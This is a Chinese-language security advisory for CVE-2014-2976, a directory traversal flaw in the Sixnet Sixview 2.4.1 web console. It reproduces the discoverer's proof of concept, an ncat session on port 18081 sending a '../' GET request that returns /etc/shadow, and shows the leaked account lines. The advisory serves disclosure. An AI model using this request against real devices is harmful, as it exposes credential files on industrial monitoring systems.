发布日期:2014-04-22
更新日期:2014-04-27
受影响系统:
sixnet Sixview 2.4.1
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-2976
Sixview是远程监控及管理软件。
Sixnet Sixview 2.4.1版本存在目录遍历漏洞,这可使远程攻击者通过向TCP端口18081发送带有".."的HTTP GET请求,利用此漏洞读取任意文件。
<*来源:daniel svartman
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#Exploit Title: Sixnet sixview web console directory traversal
#Date: 2014-04-21
#Exploit Author: daniel svartman
#Vendor Homepage:
#Software Link: Not available, hardware piece - appliance
#Version: 2.4.1
#Tested on: Sixnet Sixview web console (Linux based appliance)
#CVE : 2014-2976
PoV, Sixnet sixview web console handle requests through HTTP on port 18081.
These requests can be received either through GET or POST requests.
I discovered that GET requests are not validated at the server side,
allowing an attacker to request arbitrary files from the supporting OS.
Below is an example of the affected URL and the received answer using
netcat:
ncat <HOSTNAME> 18081
GET /../../../../../../../../../../etc/shadow HTTP/1.1
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html
Keep-Alive: timeout=15, max=50
Date: <SNIP>
Last-Modified: <SNIP>
Content-Length: 1025
root:<REMOVED>:15655:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
<SNIP>
建议:
--------------------------------------------------------------------------------
厂商补丁:
sixnet
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
?killnav=1